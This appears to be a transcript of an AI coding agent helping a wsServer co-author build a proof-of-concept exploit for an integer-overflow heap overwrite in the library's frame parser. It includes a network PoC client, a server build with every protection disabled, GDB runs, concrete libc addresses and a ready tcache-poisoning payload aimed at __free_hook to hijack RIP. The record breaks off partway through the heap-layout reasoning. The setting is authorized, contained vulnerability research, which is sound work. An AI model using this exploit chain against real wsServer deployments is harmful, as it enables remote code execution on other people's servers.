zai-coding-plan / glm-5-turbo
Step

Now the orchestration script:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Make poc_run.sh executable
$ chmod +x /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let me compile the PoC client locally to check for errors, then build the Docker image:

Compile PoC client to check for errors
$ gcc -Wall -Wextra -std=c99 -o /dev/null /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c 2>&1
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Clean compile. Now let's build the Docker image:

Creating plan
Create tests/Dockerfile.poc — Ubuntu 20.04 build environment
Create tests/poc_rip_control.c — PoC client (connect, handshake, heap shape, overflow)
Create tests/poc_gdb.txt — GDB helper script for heap recon + RIP verification
Create tests/poc_run.sh — orchestration script (build Docker, run server, run PoC)
Build Docker image and do initial heap reconnaissance
Tune PoC parameters based on recon
Demonstrate RIP control under GDB
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Build Docker image with unprotected echo server
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

DNS resolution failure in Docker build. Let me check the network and try again:

Bash
$ docker network inspect bridge 2>/dev/null | head -20; echo "---"; cat /etc/resolv.conf | head -5
The user rejected permission to use this specific tool call.
Ok try again, I restarted docker.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Build Docker image with unprotected echo server
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Build succeeded. Now let's do the initial reconnaissance run — launch the server under GDB and fire the PoC:

Start server container in background
$ docker rm -f ws-poc-server 2>/dev/null; docker run -d --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt -ex "set pagination off" ./examples/echo/echo 2>&1' > /tmp/poc_gdb_out.txt 2>&1; echo "Container started, PID=$!"
Container started, PID=0
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run PoC client with minimal overflow
$ sleep 3 && docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
Error response from daemon: container 80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea is not running
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Container exited already. Let's check the output:

Check GDB output from server
$ cat /tmp/poc_gdb_out.txt
80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Check container logs
$ docker logs ws-poc-server 2>&1
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The __free_hook symbol isn't available before the program runs. Let me fix the GDB script:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let's run the auto mode — server in GDB + PoC fired automatically:

Run server under GDB and fire PoC
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' &
SERVER_PID=$!
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 2
echo "=== GDB Output ==="
wait $SERVER_PID 2>/dev/null
echo "=== Done ==="
ws-poc-server
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
=== Done ===
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The issue is GDB validates commands at definition time. Let me restructure the script:

you got froze, please continue
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run GDB server + PoC client
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' > /tmp/poc_out.txt &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
echo "=== GDB Output ==="
wait 2>/dev/null
cat /tmp/poc_out.txt
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The commands block validates at parse time on this GDB version. Let me use start instead:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run GDB server + PoC with fixed script
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB Output ==="
cat /tmp/poc_out.txt
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Did you build with debug symbols? 
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

No — the Docker image still has the old GDB script (built before I updated it). Let me rebuild:

Rebuild Docker image with updated GDB script
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -5
#11 exporting to image
#11 exporting layers 0.0s done
#11 writing image sha256:de3118efbe51a2bbfdd34b09ef5d8ba2386e809d2db62bb6dcc65e42e81e1a89 done
#11 naming to docker.io/library/ws-poc done
#11 DONE 0.0s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run rebuilt image + PoC
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
=== GDB ===
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The register offsets are wrong. Let me fix the GDB script to use proper variable names since we compiled with -O0:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Rebuild and run with fixed GDB script
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -3 && \
docker rm -f ws-poc-server 2>/dev/null; \
docker run --rm --name ws-poc-server --network host --privileged ws-poc \
  bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt
#10 writing image sha256:e4e4b2ceb61fd3c60f3d6c5202eec1750f12d9fe01bfd593c8087f6c10115c8c done
#10 naming to docker.io/library/ws-poc done
#10 DONE 0.0s
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
[+] Connection 1 closed
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Check GDB output
$ cat /tmp/poc_out.txt 2>/dev/null
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at examples/echo/echo.c:118
118	{
=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system        = 0x7ffff7e01290
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Excellent results! The GDB output shows the overflow is working perfectly. Key findings:

  • __free_hook = 0x7ffff7f9de48
  • msg buffer at 0x7ffff0000c70, chunk size 0x25 (32 bytes, NON_MAIN_ARENA)
  • Overflow wrote 128 bytes starting at msg[16]
  • The corrupted next chunk at 0x7ffff0000c80 has: size=0x21, fd=0x4141414141414141
  • Server survivedfree(msg) goes to tcache without checking the corrupted next chunk

To achieve RIP control, I need to shape the heap so a free tcache chunk sits right after the overflow buffer, then poison its fd pointer. Let me update the strategy: use 48-byte chunks (matching the handshake's base64_encode malloc) and target that tcache bin.

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review + GDB)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing past the undersized buffer

Exploit Arithmetic (verified by GDB)

  • Frame 1: non-FIN binary, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

GDB Reconnaissance Results (from successful run)

  • Libc addresses (no ASLR, fixed):
    • __free_hook = 0x7ffff7f9de48
    • __malloc_hook = 0x7ffff7f9bb70
    • system = 0x7ffff7e01290
    • exit = 0x7ffff7df5a40
  • msg buffer: chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA), user data at 0x7ffff0000c70
  • Chunk is in a thread arena (NON_MAIN_ARENA flag set)
  • Write loop error at msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
  • Corrupted area confirmed at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
  • Server survivedfree(msg) goes to tcache BEFORE the next-chunk size check, so no crash on the corrupted metadata
  • The next chunk after msg is the TOP CHUNK, not a free tcache chunk — this is why we can't directly poison tcache with the current approach

Why the Server Survives

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:

c
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return;  // never reaches the corrupted next-chunk check
}

So we need to corrupt a chunk that is already in a tcache bin, not the top chunk.

Revised Exploitation Strategy (tcache poisoning via 48-byte chunks)

The key insight from the recon: we need a free tcache chunk physically adjacent to the overflow buffer. The plan:

  1. Use 48-byte chunks because the handshake's base64_encode does malloc(29)request2size(29) = 48 → same tcache bin (index 1)
  2. Shaping: Send 1 binary FIN message of size 24. This creates:
    • malloc(48) for msg → chunk A (from top)
    • malloc(48) for echo response → chunk S1 (from top, adjacent to A)
    • free(S1) → tcache[1]: S1 (count=1)
    • free(A) → tcache[1]: A → S1 (count=2)
  3. Exploit frame 1: non-FIN binary, 24 bytes. malloc(48) drains A from tcache[1]. tcache[1] = S1 (count=1). The exploit buffer IS chunk A, and S1 (free, in tcache) is physically adjacent at A+48.
  4. Overflow: starts at msg[24]. Layout relative to msg:
    • msg[24]-msg[31]: rest of chunk A's user data (8 bytes)
    • msg[32]-msg[39] = S1+0: S1's prev_size
    • msg[40]-msg[47] = S1+8: S1's size
    • msg[48]-msg[55] = S1+16: S1's fd pointer ← overwrite target
  5. After overflow: tcache[1] chain = S1 → __free_hook
  6. Two-connection mode: Connection 2's handshake does malloc(29) → 48-byte chunk → drains A from tcache. Then free(accept) puts A back. Sending 3 messages on connection 2: the 3rd malloc(48) returns &__free_hook. The echo response writes frame data there, setting __free_hook to a partially-controlled value. Then free(response) calls __free_hook → RIP jumps to that value.

The __free_hook Value Limitation

The echo response frame header (bytes 0x82, 0x18) is fixed, corrupting the lowest 2 bytes of __free_hook. For the PoC, this is fine — any unmapped address proves RIP control. The frame header bytes are: response[0] = 0x82 (FIN=1, opcode=2), response[1] = 0x18 (length=24).

Server Frame Processing Details

  • Server reads via next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socket
  • All client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for shaping
  • The overflow happens in read_single_frame BEFORE validate_utf8_txt is called, so no UTF-8 validation on overflow data
  • Control frames must be FIN and ≤125 bytes
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload
  • Extended length for 64-bit: bytes 2-9 are big-endian

Heap Layout Notes

  • ws_connection structs are in static client_socks array (BSS), NOT on heap — can't overflow into them
  • ws_getaddress() returns a pointer to client->ip (static buffer), does NOT strdup — no malloc in echo's onclose
  • close_client() only closes socket + destroys mutexes — no malloc
  • printf in onopen may initialize stdout buffer once (large allocation, ~8192 bytes)
  • Handshake allocations per connection: calloc(61) → 64-byte, base64_encodemalloc(29) → 48-byte, malloc(130) → 144-byte, then frees

ws_file() Bug (not our problem)

ws_file() at ws.c:2078 references cli_events which doesn't exist — leftover from a refactoring.

Accomplished

Completed

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Created tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled using direct gcc invocations (avoids Makefile's -O2 override)
  3. Created tests/poc_rip_control.c — Full PoC client with:
    • TCP connect + WebSocket handshake (random base64 key)
    • Frame builder supporting 7/16/64-bit payload lengths with MASK
    • Configurable heap shaping loop (binary FIN messages, drain echo responses)
    • Two-frame exploit (non-FIN binary + FIN continuation with 64-bit overflow length)
    • Configurable overflow payload (hex string or default fake-chunk pattern)
    • Two-connection mode (-2 flag): overflow on conn 1, trigger on conn 2
    • Compiles cleanly with -std=c99 -Wall -Wextra
  4. Created tests/poc_gdb.txt — GDB script with breakpoints at vulnerable code, shows libc addresses, heap inspection at each phase
  5. Created tests/poc_run.sh — Orchestration script with interactive and auto modes
  6. Built Docker image successfully (ws-poc)
  7. Ran initial reconnaissance — confirmed:
    • The integer overflow triggers correctly
    • Heap corruption happens as predicted (128 bytes written past buffer boundary)
    • The corrupted chunk has fake size 0x21 and fake fd 0x4141414141414141
    • Server survives because free() goes to tcache without checking corrupted next chunk
    • The next chunk is the TOP CHUNK, not a free tcache entry

In Progress / Next Steps

The critical next step is to retune the PoC for 48-byte chunks to poison tcache[1]:

  1. Update the PoC command to use -n 1 -s 24 -f 24 -l 40 with a custom hex payload:

    -o 00000000000000000000000000000000310048def9f7ff7f0000

    This sets S1's prev_size=0, size=0x31 (48|PREV_INUSE), fd=__free_hook (0x7ffff7f9de48 LE)

  2. Update the two-connection mode in poc_rip_control.c to send 3 messages on connection 2 (not just 1), because it takes 3 malloc(48) calls to drain tcache[1] → S1 → __free_hook:

    • Msg 1: drains A from tcache[1]
    • Msg 2: drains S1 from tcache[1], tcache head = __free_hook
    • Msg 3: malloc(48) returns __free_hook, echo writes frame data to it, then free(response) calls __free_hook → SIGSEGV with controlled RIP
  3. Rebuild Docker image with updated GDB script (fix start vs run issue)

  4. Run the tuned PoC and verify in GDB that:

    • S1's fd is overwritten to __free_hook
    • The third malloc(48) on connection 2 returns __free_hook
    • free(response) triggers __free_hook → RIP = controlled value
  5. Demonstrate RIP = 0x????????001882 (or similar) under GDB, proving RIP control

NOT YET DONE

  • Tune the PoC for 48-byte chunk tcache poisoning (the key remaining work)
  • Update two-connection mode to send 3 messages instead of 1
  • Demonstrate actual RIP control crash
  • Document final results

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)
  • tests/Dockerfile.poc — Docker build environment (completed, needs rebuild with updated GDB script)
  • tests/poc_rip_control.c — PoC client (completed, needs update: two-connection mode should send 3 messages instead of 1)
  • tests/poc_gdb.txt — GDB helper script (completed, working with start command)
  • tests/poc_run.sh — orchestration script (completed)

Key existing files read

  • src/ws.cthe vulnerable file, especially:
    • Lines 1410-1552 (read_single_frame): the vulnerable integer overflow
    • Lines 1229-1247 (frame_state_data struct): field offsets (msg_data at 0, frame_length at 40, frame_size at 48, opcode at 64)
    • Lines 155-193 (ws_frame_data struct): huge struct with frm[2048] buffer, frame_size at large offset
    • Lines 1565-1720 (next_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)
    • Lines 1735-1808 (ws_establishconnection): main connection loop, calls onclose after error
    • Lines 563-689 (ws_sendframe_internal): response allocation at line 636: malloc(header + length + 1)
    • Lines 1178-1195 (next_byte): reads from socket into 2048-byte buffer
    • Lines 369-390 (close_client): no malloc/free
    • Lines 514-521 (ws_getaddress): returns static buffer, NO strdup
    • Lines 48-95 (ws_connection struct): static array, not on heap
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8, WS_FIN=128, WS_FR_OP_CONT=0, WS_FR_OP_TXT=1, WS_FR_OP_BIN=2
  • examples/echo/echo.c — target server binary, onclose has no malloc, onmessage calls ws_sendframe_bcast
  • src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encodemalloc(29) → 48-byte, malloc(130) → 144-byte
  • Makefile — build system, CFLAGS uses += (can't easily override -O2), hence direct gcc invocation in Dockerfile
Ok so we got the corruption working. Plan the control of RIP.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me re-examine the current state of the code and the heap layout to plan the RIP control precisely.

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now let me re-read the key vulnerable code and the echo server to understand the exact allocation/free patterns:

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now let me look at the error path and the connection lifecycle to understand exactly when free(msg_data) happens and what happens after:

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me look at the handshake flow and the base64_encode allocation:

zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now let me look at the do_handshake function to understand all allocations during connection setup:

zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now I have a thorough understanding of the codebase. Let me now reason through the exploit strategy carefully.

Let me check the handshake allocation sizes more carefully:

The handshake get_handshake_accept does:

  1. calloc(1, sizeof(char) * (WS_KEY_LEN + WS_MS_LEN + 1)) = calloc(1, 61) → chunk size = 64
  2. base64_encode(hash, SHA1HashSize, NULL) → SHA1HashSize=20 → olen = 20*4/3+4 = 30, + 30/72=0, +1 = 31malloc(31) → chunk size = 48 (tcache bin idx 1)
  3. free(str) → frees the 64-byte chunk
  4. Returns accept (the 48-byte chunk)

Then get_handshake_response: 5. malloc(sizeof(char) * WS_HS_ACCLEN) = malloc(130) → chunk size = 144 6. free(accept) → frees the 48-byte chunk

Then do_handshake: 7. free(response) → frees the 144-byte chunk

So per handshake: allocates 64, 48, 144, then frees 64, 48, 144 (in that order).

Now for the echo path (onmessage → ws_sendframe_bcast → ws_sendframe_internal):

  • For a 24-byte binary message: malloc(2 + 24 + 1) = malloc(27)request2size(27) = 32 → tcache bin idx 0 (for 32-byte chunks)
  • Then free(response) → frees the 32-byte chunk

Wait, for a 24-byte payload the response is malloc(idx_first_rData + length + 1) = malloc(2 + 24 + 1) = malloc(27). request2size(27) = (27 + 16 + 15) & ~15 = 48. Actually let me recalculate:

  • On glibc 2.31, MINSIZE = 32 (for 64-bit), request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Wait no.
  • Actually: REQUEST2SIZE(req) = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
  • SIZE_SZ = 8 (64-bit), MALLOC_ALIGN_MASK = 15
  • So request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Hmm that's a 48-byte chunk.
  • Wait, the minimum chunk size is 32 bytes. And for 48 bytes: that's tcache index (48 / 16) - 1 = 2. Wait...
  • Actually tcache idx = (chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size / 16) - 1
  • For 32-byte chunks: idx = (32/16) - 1 = 1
  • For 48-byte chunks: idx = (48/16) - 1 = 2

Wait, let me recalculate properly. On glibc 2.31 x86_64:

  • MALLOC_ALIGNMENT = 16
  • MINSIZE = 32
  • SIZE_SZ = 8
  • MALLOC_ALIGN_MASK = 15
  • csize2tidx(x) = (x - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT

For 32: (32 - 32 + 15) / 16 = 15/16 = 0 → idx 0 For 48: (48 - 32 + 15) / 16 = 31/16 = 1 → idx 1 For 64: (64 - 32 + 15) / 16 = 47/16 = 2 → idx 2

So:

  • handshake base64: malloc(31) → chunk 32 → tcache idx 0
  • handshake str: calloc(61) → chunk 64 → tcache idx 2
  • handshake response: malloc(130) → chunk 144 → tcache idx 7
  • echo 24 bytes: malloc(27) → chunk 32 → tcache idx 0 (same as handshake base64!)

So if we use 24-byte messages for shaping, the echo allocates 32-byte chunks (tcache idx 0), same bin as the handshake base64 allocation.

But the exploit frame 1 also needs to be a specific size. The msg allocation in read_single_frame is realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin). For frame 1 (non-FIN), *msg_idx = 0, fsd->is_fin = 0, so realloc(NULL, frame_length) = malloc(frame_length). If frame_length = 24, then malloc(24) → chunk 32 → tcache idx 0. Same bin.

Now, the key question is: can we get a free chunk from the handshake adjacent to our exploit buffer?

Let me think about this differently. The shaping phase happens on connection 1 after the handshake. The handshake on connection 1 allocates and frees: 64, 32, 144. After free(accept) (the 32-byte base64 chunk), tcache[0] has 1 entry. After free(str) (the 64-byte chunk), tcache[2] has 1 entry.

Then the first echo message (shaping): malloc(24) → gets the freed base64 chunk from tcache[0]. Echo sends: malloc(27) → gets a new chunk from top. Echo frees: free(response) (32-byte, into tcache[0]). Then free(msg) (32-byte, into tcache[0]).

So after 1 shaping message:

  • tcache[0]: msg → response (count=2)

After 2 shaping messages:

  • msg from tcache[0] (pops response), response from top, free both
  • tcache[0]: response2 → msg2 → response1 (count=3? No, tcache max is 7)

Wait, let me trace more carefully.

After handshake frees on connection 1:

  • free(accept) where accept was malloc(31) → chunk 32. tcache[0] = {accept}, count=1
  • free(response) where response was malloc(130) → chunk 144. tcache[7] = {response}, count=1
  • But wait, free(str) happens first in get_handshake_accept before free(accept), and free(accept) happens in get_handshake_response, and free(response) happens in do_handshake.

Actually let me re-read the order:

In get_handshake_accept:

  1. calloc(1, 61) → str (64-byte chunk)
  2. base64_encode(hash, 20, NULL)malloc(31) → accept (32-byte chunk)
  3. free(str) → tcache[2] = {str}, count=1
  4. return accept

In get_handshake_response: 5. malloc(130) → response (144-byte chunk) 6. free(accept) → tcache[0] = {accept}, count=1 7. return response

In do_handshake: 8. SEND response 9. onopen callback 10. free(response) → tcache[7] = {response}, count=1

So after handshake:

  • tcache[0]: accept (count=1)
  • tcache[2]: str (count=1)
  • tcache[7]: response (count=1)

Now, shaping message 1 (24-byte binary):

  • read_single_frame: malloc(24) → chunk 32. Gets accept from tcache[0]. tcache[0] empty.
  • onmessagews_sendframe_internalmalloc(27) → chunk 32. Comes from top.
  • free(response) → tcache[0] = {response_echo1}, count=1
  • Back in the main loop: free(wfd.msg)free(msg) → tcache[0] = {msg1 → response_echo1}, count=2

So msg1 is at the same address as the original accept chunk, and response_echo1 is adjacent (from top). Actually no - response_echo1 comes from top, which is a different location than accept was.

Hmm. The problem is that we don't know the physical layout. Let me think about this from a higher level.

Actually, the key insight from the previous session's GDB run was:

  • The overflow buffer IS at some address
  • The adjacent chunk was the TOP CHUNK, not a free tcache chunk
  • We need a FREE chunk adjacent to the overflow buffer

The way to achieve this is to have the overflow buffer and an echo response allocated consecutively from top. Then when the echo response is freed, it goes to tcache, and the overflow can corrupt its fd pointer.

But wait - in the current flow, the overflow happens DURING read_single_frame, before the echo response is sent. So the echo response for the exploit message hasn't been allocated yet.

Let me reconsider. The exploit is:

  1. Frame 1 (non-FIN binary, 24 bytes): malloc(24) → chunk A (from top or tcache)
  2. Frame 2 (FIN continuation, overflow length): overflow writes past chunk A

After step 1, the only adjacent thing is whatever comes next from top (which would be the top chunk itself). There's no freed chunk adjacent to A.

Unless... we can pre-shape the heap so that a freed chunk IS adjacent to where A will be allocated.

Strategy:

  1. Send shaping messages that allocate from top in a known pattern
  2. Free specific chunks so they're in tcache
  3. Then the exploit's malloc(24) gets a specific chunk, and the physically next chunk is free in tcache

Let me think about this with concrete steps:

Step 1: Shaping on connection 1

  • Send N messages of size 24 bytes each
  • Each round: malloc(24) from tcache/top, malloc(27) from top, free(27) to tcache[0], free(24) to tcache[0]
  • After N messages, tcache[0] has 2N entries (capped at 7), and top has advanced past all the "in-flight" chunks

Hmm, this is getting complicated. Let me think about what the GDB run showed us.

From the previous session's recon: the overflow was confirmed working - 128 bytes written past the buffer. The server survived because free() went to tcache. The next chunk was the top chunk.

The revised strategy from the summary was to use 48-byte chunks because the handshake's base64_encode does malloc(29) → 48-byte chunk, same tcache bin.

Wait, let me recalculate. base64_encode with SHA1HashSize=20:

  • olen = 20*4/3 + 4 = 30
  • olen += 30/72 = 0 → still 30
  • olen++ = 31 (nul termination)
  • malloc(31)request2size(31) = (31+8+15)&~15 = 54&~15 = 48

So malloc(31) → 48-byte chunk. tcache idx = (48-32+15)/16 = 1.

Now, if we make our shaping messages use a payload size that results in malloc(X) → 48-byte chunk too:

  • For the msg: malloc(X) → 48-byte chunk. Need request2size(X) = 48. So X can be 25-40 (since (40+8+15)&~15=48, (25+8+15)&~15=48). Actually: (25+8+15)=48&~15=48, (24+8+15)=47&~15=32. So X must be 25-40.
  • For the echo response: malloc(2 + X + 1) = malloc(X+3). For this to be 48-byte chunk: need (X+3+8+15)&~15=48, so X+3 must be 25-40, meaning X = 22-37.
  • Overlap: X = 25-37 → both msg and echo are 48-byte chunks, tcache idx 1.

Let's use X = 32 for simplicity.

Now the plan:

Connection 1:

  1. Handshake: allocates/frees 64, 48, 144 chunks. After: tcache[1]={accept_base64}
  2. Send 1 shaping message (32 bytes):
    • msg: malloc(32) → gets accept_base64 from tcache[1]. tcache[1] empty.
    • echo response: malloc(35) → from top. Call this chunk R1 (physically after accept_base64? No, accept_base64 is from the handshake which was earlier...)

Hmm wait. The accept_base64 chunk was allocated during the handshake, which allocated: str (64), accept_base64 (48), response (144). They were allocated from top in order. Then str was freed (64-byte → tcache[2]), then accept was freed... no wait.

Let me re-trace the handshake allocation order:

  1. calloc(1, 61) → str, chunk at top, 64 bytes → chunk_str
  2. base64_encodemalloc(31) → accept, chunk at top+64, 48 bytes → chunk_accept
  3. free(str) → chunk_str freed to tcache[2]
  4. Return to get_handshake_response
  5. malloc(130) → response, chunk at top+64+48, 144 bytes → chunk_response
  6. free(accept) → chunk_accept freed to tcache[1]
  7. Return to do_handshake
  8. free(response) → chunk_response freed to tcache[7]

After handshake:

  • Heap layout (from start): [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [top]
  • tcache[2] = {chunk_str}
